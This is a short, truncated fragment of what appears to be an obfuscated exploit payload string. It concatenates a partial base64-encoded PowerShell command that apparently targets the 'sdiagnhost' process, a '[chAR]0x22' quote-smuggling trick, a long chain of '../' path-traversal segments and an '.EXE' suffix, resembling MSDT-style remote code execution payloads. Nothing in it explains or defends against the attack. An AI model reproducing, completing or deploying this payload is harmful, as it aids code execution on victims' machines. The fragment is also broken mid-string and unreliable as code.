"9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))')" + ")))Y" + "/../../." + "./../../.." + "/../../" + "../../" + "../" + ".EXE" + " " + "\""; |